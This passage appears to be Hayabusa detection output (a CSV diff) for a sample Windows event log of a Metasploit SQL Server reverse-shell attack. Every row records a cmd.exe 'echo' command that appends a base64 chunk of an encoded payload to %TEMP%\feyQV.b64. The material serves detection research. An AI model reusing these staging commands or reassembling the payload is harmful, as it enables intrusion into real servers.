gSDxgQD8P//deCLRQjxUnXojgH/SIvoXjPJ69yJRfRm0IlN/KxxjcMMvrL4kQOLTfxZ+QZ9CotEjcFBiU386w68/uAd/7fA8q730UlFwYuni/qLfQPQwen688KLRfiLy4PhA4PAUvOkixPqRaSF9nWOi0Vmtl/GAgBbJ+Vdw5CQDJCQVSTsg+wI6YsNyPNAkaHE80AAIxXK80AAF1aL9QxmiU0+i2oIhfZXc0X46lXpjV34f1Z8BIXJc/SLzzaLFbzzWQ6LyF9eW4nvirR/HUAAiFEEi1FdwgwAhfYLLQUIgfnNAwAAcxlhdRBRz7TzQABqBderyiwAAPI8EGnAiy8PjeWDAAB3zQAAAIvCi8GL1rkKAAAAgef/AwBZTppeAACL8ovIhTt8cH/qgfmoAwAAcgND/oF69nyJfwUk+wmcWIP5CXUMoAl1CIEEzeoAAKRHP/8ARAAAfAaDwQHWowAPvgOLdRBQUWis80AAIgVW5E4sAABgxBSFwH1tpxVI10AAm85fiXigqPNAAIhBBItLXluLY10ZCwAohL8ApQAAmYHi/wEmQwPCwb12g+uFfAiDwQGD1gAzwA++E4sUEFJQDGic80AAagUC6Jq+AACDxBiFOX0Ti8aLDaTzQACJCIoVqPNAAIhQBIvGX15bi+VdwgxhkKuQkJCQkJAEPZCQkH82VYvsU1aLsxJXajBW6I9/>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xf64 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:15.201 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo //+LXQiLFYAwQAAHfRBnA+wwLwPHQBQAAAAAi3yJUQShyMCOAIsLg8xAiUEIi6+NDL3mAJcAx6Eg7gIMAIsDUVaJkRjoSO//mot1FI0MvQAOagCJTaiL0Yv4wekC89yIyoPhA/Oki29fXolBHIsTi00M1KYcxxkBAAAAAIsxeQEAAADHQiQAAAAAi9mJQQwdEylCaosLW4neLDPAXcIQ/5BVi+xW4nUIV4tGFIXAtgiLRiCAOAB1TzxODItGGDv7x1YUAAAAALgki1ayiwSkiUYggDhndRaKUAFAhNJ0KInMIIoQgPotdR5BiU4Mx0Yg1PYUAJhNEIqHEF9eiAG4fhEBAF2zEACLViCLricPvgJCg/g6iZEQiVYXD3LQAAAAUN//FXzBQACDxHuFwA+EvQAAAICyATp0GotNFMcBAAAAAItWIF06AA9wkn0AAOmKAAAAi0ZygDgAdAeLsRRbARl0i5b/i04PiYvCg1YMO8h/ncdGINT1QQA8Bwk6dROLRRCK3hBfsIgQuH0RAQBdwhDYi0YEhcA2H4tWHMdOELnBAlDoCUkAAItOzVBo6PNAADb/VgSDNhCLRRCKAhBXW4gQuHwRTQBdwhAAi04cixSBA0UHiRDHRiDUAkGlhEYMi1UQik4QX8zAiApeWMLiAIN+EC0PhPrG//+LCOH1OgCJA/9GDItGBIXAs1YZPyu+H9VOHA5GEFCLEVLFkUgAcFCLRgggzPNAAKz/PQSDxNaLVRAIThCO7nyRAQCICl5dwhDlkJCQkJCQ++eQkLCQkJBVi+xRVrTo8QEAAIXAD4X9AAAAgz3cCEEAFA+MIQAAAHWExYkAZ8CNheEAACrHBYQDF2oBAILJVBVcwEAAi/Cv9nRQ8VgDQQBxwHUdDspy9EAAUQTox0sfo4PEDKNYA0EAhcAPhK8AAACNafxRVorQi/CF9nSAizH8i0UMUlZQ6IRIAACLTQiDxAxTiQu9FUTAQABT/3BawNAAi94w/1P/FSTBQABQ6IUAAACLlSeDxFuF/3R4jTSFUAAAAGqbFVzBQACDxM6JB/8VJPVAAItZ14FGMIvRwekC86WLQoPhA73OHv8VysBAAIt9KH5AAP/WiwgDhcl0Fv+6i2b//1XHwgAA7QD/FTDBQACDxKEzwF9e7+VdwgwATgEHFUyfQCLpbv//9JCQkJCQkJCQkJCQVYtxUYtFDFOLWBBWhdvTfRjSAQB5AGaDOAB1sWbUeALudAbbg8AC6+ArmgyDwALRS4lFELcEnQQAAGpQttjmwUAAi/iLRRCQdEABVol1/P8VXLxAAIPECI1NqIkHjVXRUVCLRUACMeg06AAAi/Bmiwcr8lZQaxUgwVv9uQFyAEB5xKg7MokHlSk6Wv+NRwSJTQxBi1D8ysICiaPVMAkWRoTSiQ119cJVDIPABEqJVQwakotqCMcESwAAAB2JOF+Lw15bi+Vdw5D4kJCQkJCQkFWL>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb0 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:15.474 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 7F3smDkAAKGIA0EAwchAhcmjiANBRvIGM8BA5WzDjVX4UujXGAAAg8Q5hcAPVoIAlgD/FWDAQACjVAlBAOjo6f//scB1c1ApUHhF/FDE7O//8oXgdAlMIjYAOYu2hpGLTfxoJPRYAFHoYfb//42VPf7///dqApcV0MFABoXArTlmi4Vo/v//PAJ16jPJisyEYXV+i1WHUhViswDrYEX8IVNpRPuSg8QIMz+L2V0w/xXUwUAAuBEAAACL5W/ykMqIA0EAyKOnA7kAlFboduon//8V1MFAAKFUCUHjUP+7ZOJAAMOQOJCNkJArkJCQkFWL7IpFZNqobHqXi0UImMcAALcAk7iHEQEAXcIQAIt9DOj/AAQAvDQTi00IuPgAAABfxwEAAwAAXcIQAFPKahBWaCQwBvPQcQTl//+LdQgzu4kGiUgEixaJegiL3408v4kYi0Qj57aJSgyLBoTiiTuSELA2ixaJiv8gAACLBomIGDAAAOjH6f/5iw5XU4mBHDC/AOi4zv//ixZeW1+JgiAwAAAzwDPCEACQkJCpkJCQVYSmi0UIU1ZXi0gEi1AIO8p1DF9euMsAAABbXQEIAJaQijBDAItdDI0niYtnjTyKuQUAAADzpf1TBEoBAAAAO9EPheIAOXOLUwyLMgSKUwiE0XQvi1AMM8mF0nYPjXAQOT50CBaDWwQ7ynLJO8p1E4H6ACwAAHMLiXyIEItIDEGJSBn2QwgEdD6LkBAQAAAzroXSBIGNrRQQAGE5PnQIQeZ5BDvKHPQ7ynUclfoABAAA2BSJvIgDWAAAi9UQEAAAQYmI/Y+NAPZDCHJ0PkGQFCD4ADMZT9J2SI2wGCAAAMI+dAj2g8apO8rD9DvKdRyB+gAEAABzD4m83RggAACLiBRlACRBiYgUIOEVFehfMCIAfgaJuBgwAACLSARf3m6JSAShwFtdwkopHF64CQAAACZdEggAkJBmkJBKo5CQkJBVYCCD/wiLRQxTVleDeLwBD4V3AQB5iwQ3lkUIM8mLUASLewS80ol9+HZiNrAcMAAAg8YMjx50FkGyxhTzyqL0X164fxEBAFv7Yl3CWgCL2UGNcv87yolwBHNPjRybjTyJweMCwZoCKwSJfQghVfyLiBwwAACLVQyLUr6NNLM7VuF1Bf9IWOsQRzwLuQUAAADmpQE5CINAuHoJ/DPHFEmJZgiJAfx1yIt9+ItQJjPJhdJ2Lo1wEDlbdAqtg8YEO1ty9OsQSjvKc91cVIgQi3LvQYkyi3AMg3EEsDtqcu//SP+LkBAQAAAzyYXSMzqNsBS3AACmPlwKw4PGBDvKcvQSJko7ynMbjZSI3hAAAItyBHqJMouwyRAAAIPCBE47zoTs/1QQEABti5AUIAAAM8lpmnaBjbAYIAAAOXR0CkHzxgQ7ynL06yZKO8pzG42UiL0gAAC9cgRBiWOLsFMgAK2DLgROO85yQP/NFHwAAIuIpDBkYTtB>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x8e4 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:15.748 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo dQuFyX4HSYmIYTAAAF9ezNBbi+VdwggAX7i4lQBqcVuL5V3CCIyQkJCQkFUf7P8gMADO6JNUAIZni+oIGVeLSwTHwHVafUUUX/jzxwAAAJj9M8CL5bjpFACLdRCLfQqF9n8K0ASF/3MEM8CpJWoAaI5CD9RWV+igegAAagBoQEIPAFZXZ0Xs6E9TAACJRfCNRVO5hwQAAI1zDI295JDDH1DzpbkBBAAAh7MQ/MMAjb2vV///jZXo7v//86W5y8IAAI2zYD4AAI294Bj//42F5K7//0eljY3gz///UYsfGDAAAFJBUFH/5OXBMQCLVVAz/zvHiQIuIIs12MFAAP/WhWB3hFcBAOf/yl9eBXeW2ABbJOVdwhQAqg5fXrh3ESgAW4vCXcLNfYuWBIl9EDvAiX34DzgPAQAAiboIiX3814McMAAAA8cRmoQBD4UZAQAAi0gMzJU836//UotxBFaJdfSrhVQAAIXAdSZMhejv1v8Y6ugt9gAAhQB1FVje4M///1FW6GNUAACF5g+EYQAAAIuzHLCuFotFCNn3i7sgYAAAA/i5BQAAAPOlixkgugAAyY306MdEAssAAI0ILd///9ZX6CRUAKiLdQiFwIwPi4sgUQB4gEzjCi4ARDFUjZXo7/9FUlfIAVQAAIWudA+LPCAwAACAbjAKBI1EMAqN1vLP//9Rm+iEUwAAhcB00ouTETAAAIBMMgptjYOYCotN5ot9/EGDxhQ4TRCJdQiLRfiL6mFAg8cmfYCJRfiJffwPgvkx///VOItNFCNFHYkBnUVeO8d0CJ2TmDA11FgQX14zwFsK5V2FFGWQXrgJAAAAW4vls8IUAPOQkGhVi+zyVgZm1AyF/3UFvwIAAACLRRiLdQhQVkpxAQAAwV0Ui00Qg8RbPFFXhxW8wUCPVBZBQgSLBotABIPw/3UeizW7lEAA/yyFvw/qlAAAfvfWX14FgA4KAFtdwiEAgz3cCI4AFHxyakFqIg/0FXDArwCHNv8VbMBAAIvLx0tqAI1NDGrHIYtKBOlRUMcVaMBAAArAdIeLFotCBFCfFcBYQACLDotVDInHBItFEMRqU+xXUZa3AAAAixaDyP/DxMyJQpTWIBpAAGjgZkAA50IkiwbHQCimAAAAi+RWiw5RPCzvrf9fXjPAWLHCkgDCkJDAi+xWk3UIi0Yug/j/dClQ/xXAwUAAi/j/dRaLNdh4QAD/1oWNdCkT1gWA/AqYXl3Dx0YE/////4tGTlLAdGOLQBBQV9vGwEAAx0ZAAAAAADPAXl3DLJCukJCQo5DckNlVaOyLRRCLTRRWi3UIV+jNDItWEGoAV1KJRq6cThanbQYAAF9GaGoAoVDoYQadAIPEGF9eXcM6kJC9kLGQkJCQVYvsU4sjDFZXalBT6M/i//+LdQiL+DPAi9ehjQAAACY4MKvCUIkQigaLCKnolHZi/4v4M8CL17kOAAAA86uLBmo4iVAQiw6L>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xed0 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:16.021 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo URSJGosGiwhR6Iri//+L+DPAi9cTDgD5APNCJAZx3Gdqg4lQYJkOi1EUoBqLBsdANAEAAACLDoPBSFHoc/j//yRlW13DkJCQVfDsVov6CGjg21oAVosGquhm7v//Vui1/v//bMQEXqjCBACQkJCQkJCQkJCQpJCQ/YsNgewQAgAzU4tdCFZXCUP+g/j/D4SUAQAAi0IQhcnChIkBhwCLdQyLTruNVhNRUun/FaTPQACD+NIPhTd/AACLNdjBQAD/1oXAhIT5AAAA/9YFgPwKAD2zIwsAD4VRAQCshXsgi3Mki8cLxqEOX164tCMLn1ukMevCCDuLQwQPAXMAAMH2iS30/f//iY3w/f//iYX4/v//E430/v//fwp8BB//cwQzwP0lxchoQEIPAFZX6JdMAABqAGhAmZcAVrKJRe3oRk4AAIlP/FNF+I2N9BX/8lCNlfBB//9RUmoArkH/FcTBQACD+P+JRQh0TYXAdQ5fXrjMIwsAW4t6Z8IIAItL8Y2F9P7/2FDj6A1QAAA2wHRei0sEuVUMjUUIUlBoBxAAAGj/ywC9icdFCgQAAAD/CKDBQACFwDEnizXYwUBU/9aFwHXbX28z1FuL5V3CCAD/1l9eBS78CgBbdTpdwggAixQIhbVv619eW4vl6MIIAMFOAotDEIlzFGaD6ioAaBLHriyvGwAAxkgYi3AgsywEQQcz0vOmdV5fx30LAQAAAI9/wFuL5TrCCBW4wHUJAF9eW4vlXcIIdJBNkFWL7IObCEXyuVZP/xV4wEAAi1X8i0X4MywzyVLWyAvIagqhUeiNS2wALQDmhkjigdqWXikTi+Vdw5DPcpCQkJBV1YyLDQwzyU8z9maL+g4ofokcSwSNFC2LTabb4gOJETPSZotQ1KNRIDNF/4tQg4BRCDNQ14tQCCFRDDPSsYtQBolREN3SZotQe0qJURQzs2aLEM0LbAcAAIlRGDPSZotQkYm+HItHDWaLFgaLTKJAqUDdjVQy/zP2iVE2M9KJYCSJRbRmnDCLxmEDMgCAeQX2g8hmE/Uqi8aemb+QtgAA92xfhYN1GovGvsXq9ACZ9/6F0nTDi5Igg/g6fgS5PUEgXjF2kJCQkJCQkJDtkCmQ+rzsgey1AAAAU1ZkdQtXi32Hi4GLxyEABdlAhkJqCrXRlosp8lFQ6ASEAACJRbKLwsMGHx+5CEEAiVXwg/gUD4xJANwAjU38UfeyAfkAnsQEjfbc/5nsUlB7FUHAQACLRfyNTcqNVTRRUsT/FYzAQI2LXcKNhcz2U9+J/v80g8QImwCvQEIPAFZK6HBLAOCJA41V9I1FzFJQ/xWIwEAATNWSi0X0XvYzyQv4VgvIagpSUejJSQAAwABjl0hlgRiWXikAaEBCD35ShuixSQAAmvcBHgAXPUIPAFF2gvDonkkApItNi0X8EnMoi1xUiwgD+biJiIiI9++LyrjFd6KRA8/B+QUW0cHqHwPK>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x988 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:16.295 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 9+4D1tb6Cy7CldHB6B8DaxBDJF8tM8BbCuVdwsQAjU306VXsUdT/FYRKuACTRdx1TfRQEP8VfMBrDYtdV41V3FIn6N7J/9yDxAhqh2hAQg8tP1fo3XYAAInojYUg/4X/UP8VgMBAADPJK050mUh0skiDcIuNIP+o/4tVyF/HQyQBAADRjQTlXovIweF+K4/32cHhAolLmDPAW4vlXcJMAIuVdv///9eFdLVS/wNNiUski8hfweEEK8gV99nB4QKJSygzwFuLEl2oDACLhSD//7WJSyS80MHiBCvQ99rB4gKJUyhfXjPAW/rlXcIMAJCQDpCQkJBVi+yhQAVBmoXAdSp6QASaAP+AgMBAAC/sBEE/i0WoxxJABe4AAQAAAGcAQARBAKHsBMQAXXGLTTvHAX4EuACh7ARBAF3DkJCQkJCQkJCQCFWL7ItFUYtNCGqyWugDAIZQUegZQwAAUP+IkMBA113CCACQ5e6QkJCQkJCQkJCKkFWL7ItFEFYdswxXi30Ii0ggnFDlVldRUujjPwAAgwMQhcZ1Ll+4HABrAF5dwgwAxvFB/7VfM8BeXRkMAJCQkJBV91VTi10MVot1CFeLffvOz/+JXhACiV5QdA9X/3WowQcAZolGKkh7bbWD+0RquLgQAAAsx0ZiBNIAUolGCYlGtI1GSYmrIF9eW13DkJAqkFXq7I5FCMVNDGZVEFM5XS1WxwAAAAAAnscBAAAAAIv7g8n/M8DgxwIAAPKu9xlJjdGv/zvzi/5yPKGMwUCsgzhKsykLZtsEiotR/xVoAkAAg8QI6xGheNxAADPSiheLCIoEUYPgBIXADwdPO/tzyusELPtzJVMZFWxpQA0nxASD+AF8Iz3//wAAmRz6VRBf2qRmidMmT13CxgCAPzp1Njv+czI7+3UMX14qFgAAAI8ewhQIEkcBdv8VbMFAALDEBIP4AXxOPf//ZAB/pItNEI13/2aJdisNi0UYRovevlNaUrXoWdv//4u5CIt1FKzLOZCJAovBwekC86WLyIMrA2LA86SLCl9exgQLAFtdwhRDVYvnDV0Yi1UIi8FWi3UMg+ADV8cCAACTAHQrhfZ0HIt9rAj/dRWD+AOyEPbBAnQdXxyHEQEAXgXCGPhfuBYAAABvXcIYAIuqEIXAdQW4AgBbAIt9HFe8i017UVBWUujSAAAAg8QYX9ZdwhiPkJC9kFWL7IPsJFNWi/0MM9sj81dOdfR1Bb5A9EAAigY8fA+MuQAAADyCDwSXABgAaDT0QABW/xUcwcIuixyLIYPJJDN2I8QI8q730Uk70Q+FjAAAAFb/FcjBhACJRSyNW/hpTeyNVdyJReyJXfCJTeiJVe1KBAyLSAzFGQ+EqBcQAIld/ItVHGo4EXjF2v//i/gzwIv3uQcAAF/zq4tFHItNDIt9/IkGi1EMiwRMi1UUUmoCi9BWiUks6HX9//+DZgyF23VDi0X0FMB0DVCLRRxQ>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x934 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:16.568 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 6N3n/w6JRgSLGAiJJusxVv9DrMFA9jsUibkMdYWLNQvBQHX/KS/AdC//1pOkBYD8CgCUPuVdw4tTBMFWBIlzJItFDCBuBIveibv8Y0gugzwPAA+FW5j/Sl9e7+tbwlFdw5BVizeBOlQCAACLTThTVjP2iwGLUQSJRfSLRRBXiXXsigCJ5eOEwCF14Ilk8Il12IlV3A+EhwoAAIuHUjzHdDwqRfSFwHQtO6HccvkIfQxXiQf/VQiDxASFwA+LlAoAAItPBAF7iU3ci1VGQIlF9IoKiEj//0Wp6awKdQDjfT+LDXXBQAC4AQDQADMqJDkBiUW8/0XAiVXIiVXEiVXUxkVbIIpV+4kEiJISihdqXFL/FWgNRniDxKsz0ushi8R4wUAAM8DIB4sJigQ3g4wCO8KhmMmQAAC5rQAAAIoHPC11BjhVwI/r9DwrdQYecsRH6+o8I3UGiYXUR+sthyCuButNyEfr1jwwdQaITd9H68yhdMFAAIl9EAcIfhQzyb0Eig+z/xVowUAAg8QIM1U/EosNCcEIAH3AigeLCYoEQYPgBGeQdF0Pvg+D6TBHieQQixV0wUAA8E3ggzoBfhUzwGoEigdQ/xVo0Tr9i03gMsQI6xGheIvKQzPSiheLAIpu18XgBEzSO8J0Ig8yb48MiRKNTErQ67mJfRDHcDIBUwC56yaAPip1HosDmcNRRzvCiX0Qx0XMAQAAhn0FfJzA99iJRQuKA4ngzFTsLg+F0QAAAKF0O0AAR7hF5AEAAACJXxCDODJ+1TPJKgSKD1H/FWjBQPSDXQjC0uuQiw14wUAAM8CKB4sJigRBg+AEO2N0Tw8TD/npMEeJd5+L+HTBQACJTfCDOk5+FTPAagSKB1D/Fce1QACLTfCDxFTrEaFmwUAAM9IZe4sAigRQ0bUEhcB0JbG+h40MiUeNTErQ67uAPyp1NosDg8MERzPJO8IPnClJI8iJTfCJFRBqA2hU9EA6V/8VNMFAAIPE84XAdMWKBzxxdYf4O0frMYlVBOvbiVXuylV+69M8bHUIuAEAAB9H6xg8aHUruAIAAABN6wzomgCqAGYIM8CDxwOJmRCLVZLgwg+++YM8eA953Vm4NjPSipcEfECz3CSV6HtAAIXAViKLSwSNVfyRA1Iwyqxvw5hSjVXQUmoBUVBFcg3NAIPEGOuOg/iW9xCD+AL+C4Py6DPhZotD/OsFiwODwwSNTfyNVaxRRk3QUlFqAVCJcNjo3AwA24PJFIuPi0XkD8CWxrs4ewCLRV6eUAGB+gC2AAByarj/AQAAOUX8D4POAwAATsYGJIvm/EE7yB4x/HITc4sDAACFvHUii0sEjVU9iwNSjVUfg8MIUo1V0FJqP1FQ6HEMAAArxBjrMYP4AXQNg/hadQgPvwODwwQWBSQDQcObik38jRis+FdN0FJRaldQiUWX6EgMAACDiBSLkYtF5IXAdCezRbSNUOiB+gACAADH>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb3c | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:16.841 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo Bcz/AUgAOUX8cw9OOQbdi038QTvIiY3ncvGLRdCFwJyE/QEAAMpF+w/p1N2UAIXA0x+LUwSLA411/IPDCAGNdbpWUWoDUi8ZoUMAAINaS+sug/gtdBA1+AJ1C4PDBDPAZos2/OsFiwP1w0SNVfxSjVWsUlFqMavoU6AAAIPEFD1Ki0XkhcB0J2JF8I1I00j5AOwAAHIFuP8BgQAWdcpzD07GBu2LTfxBO8aJz/xy8YtF1IXAD4RkAu1ogD4wD4RbAgAATsYGMOlLNwAAhcB1qYtTBLYDjXX8g8MIVhp1UVZRagRSUOg1EAAAg8QY6y6DpAF0EIP4AnULg8MEM8D4i9D86wWLAwa7BI0N/FKNVaxgUWoEUOg5NgBmg8Sxi/D4ReSFoXQNi0XwH0gBgfkAAs1TcgVQ/wEAADnqhXMPTsYGMIsv/EHjyIklA3Lxi0XUhcAPgsYBAACLRdhoDQ+EuwEABItVIE5OilGIRgHGBs2LRZGD3QJYoAHlRYszg8MEhXYPpsgDAAAgReSFwHUYV/6Dyf8zwMZFF6XyrvfRSYlN/Ol3AQAAi7TwM9KUyYvGiVWWD4ajAwAAgDgAD7qaA5kAQEI70YlVmrbuxkUXIOlKAQCM3QOLReTowwjdXbSFwLgGPpsAdEW3RfCNVfxSjdet/f//Uo1k0FKLfLhQi0XUUH9FQJpQUeiiMwAAi5yLRaqDxCCFwHQ8xkX7LengAAAAi0XEhcB0CcZF+yvp0IKT+O5FPIUSD4ThAAwAxkU1INm8AAAAi2LkhYtjQLgGAAACNxZFRfCFwHUIuAEAAACJRfCdTcSNla2Nlf84A1GDwwhSUPbsCN0cJOjgBQA2i/CD7BSAJi11B8ZFeS2q6xiKRSp4wHQGxkX7K+sLi0Ughed0BFAAcSAE/oPJGzbA766LRdT3iEmFwIlN/GIiky7X/xV8EkAAg8QIhcB1EotF/MYEfy6LRfxAokX8xgQwAPTZEGI5R3UTamXt/xV8wUCEg/EIhcCiA8YARYoh+4TAdByB/vrCQABOFNtFBzvwdA0NZ/sjiA6pRfxAiUX8i0XMhcAP3AEDAACDfcCcD4X3AgAAi1Xgi/0YO4cPfukCABOAfRcwD4V+AgC2ikVfhMAPhI6pABicRXuLfQyFwHRoO2fccnZXiQf/VQjCxASbwBTmjAMAAItPBIuaQ9jckxaIEJKJRfSLVeyLTeBC5IlV7ItV/NfkhlX8jkPg0kkCAACKQoPDBIhz6o116sdF/GgAAADLRRcg6f7/9f/GkOoljXXqx+n8AQAAAMZFNSDpS///w4PDBIXAdU2LReyLS/yZiQHHY7wAAAApiVEESNn///8g+EB1aItT/ItF7MdFvAAAg9WJAukT////g/gCdRaLS/xmi1Xsx0W8AAAAAGaJEen4/v+pi0P8i03sx0UGAAAAgsoI6eT+CP+L/K2xiUUQigBQsciD+XQPh2OLAAAzwtKR>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xa98 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:17.115 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo pHyqCv8klYB8QNqLA41N/ElsBI1VrFFSanhqBFDoWgyocxrEd4vwxoEXIOmb/s//iwODw3CFwA+EwADpAMxN/I1VrFFSUOhRCQAAi/CLReQptQyFwA+ErgAAAItF8ItN7jvBD7OgKQAAiUX8xkUXIOlW/v//iwODkMeFwHR/jU0tjThqUVtQ6IAIAADrvYvhg8MEhcB074sQxI2s/f//aP8eAABRUughDQA+oPCDyf+m/jNA5wVy0UnGRRcgiU1l6eX+Nv+LmIPDBIWddC+NTfyN1axgUlDoUJEAAOlqUf//IAN7wwScwHQTjQb8jVWs+VJQ6FTdAPnpTv///76gwkAAx0X8uQAAAMZwFyDphv3//4OWBDxCdQuLQwKFwHSs09+0bzwOdfGLS/yFyWgHd7RcSQTrBPTA9smNVdJSpFC+52f//4vwg8n/i/5HwPKu99FJxkUXIIns/Ols/f9J/kj0QABu7w0IAAAAxkX7AIMC4+lU/f+uxkUjsoj964116n1F5wIAXgDGjnZN6Qrm//+LfWaLRfSFwHTxO0XcchlXiXL/HkJExASQwA+F/gAAAItPBMgHiU1WilUXiBAPiUX0i03si1X8QejS7BBNckkvyp1Ng3fAixn26fgBiyv0dUoGJvyF/5RDhcB0NDvpRXInfUUIi00nUIkIIVUIg8QEhcB0hdUVAACLRQyLEItABIlF3IlV9C0Zig6ICIdLRfSLTTxBRk+JTex1vYtNioXJdFiLTcCFyZhRi1Xgi038O9GVR4XAdB+8RdxyIIt9DItFiVeJB/9VCIPEBIXAdU+LD01XBIlN9IlV3IvBik0uiBJAiUUBiz/zi1X86+FN7LFN4Ek7yolN4He5/0UQ7VUQinCECw+FXPX//4tNDHVF9F+JAYtF7F5bi+VdwhAAX16DyP9bi+VdwhAAkKJ7QAB9eHoAlXZAAE93QACNAUAAYnhABlR0QACUeEAA7+lAuft4QAA9dkAA6HNAANh6QAAAfQwMIAzGDAwMDAwMDAwMDBcMDAwMDAwM8Aw8DHkMDAzNyQwMAYQMuFUM4AwMDAwMDAxRDAyMDAxqkQyhDAwMDCMM/VoCDAMMDAwMDAwMDAwMDD0MDAwMBAwM/QwMDAwMDAwFBmYCSQwGDAwMDAcICQwMCgwLDAy2jUkAontAAIl5QN4mekAARHlAANl5QJGieUAAjHmDAPV5QABzekAAAAgICAiHMwjgCAgIOQgICAgICAgZCAgICAgICAgICAg/wggICAgIHggkCAjj6ggIR+4nCAgICHUICAgICAhjCAgBAggICAIhCOoICAh9CAgICC0CBAgICAgIQlKnCAgICAgICAgICGwICAgICAXwCAYICQh5kJCQkJCQkFWL7IPsWFbORX1XS30QjU38UItFDI1VBlGLTQhSWFB66CMBAACaTYSLORSDxBiJR/iFyYuddAbGAnLmcgFQT/9Ts8l+D4A8>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb24 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
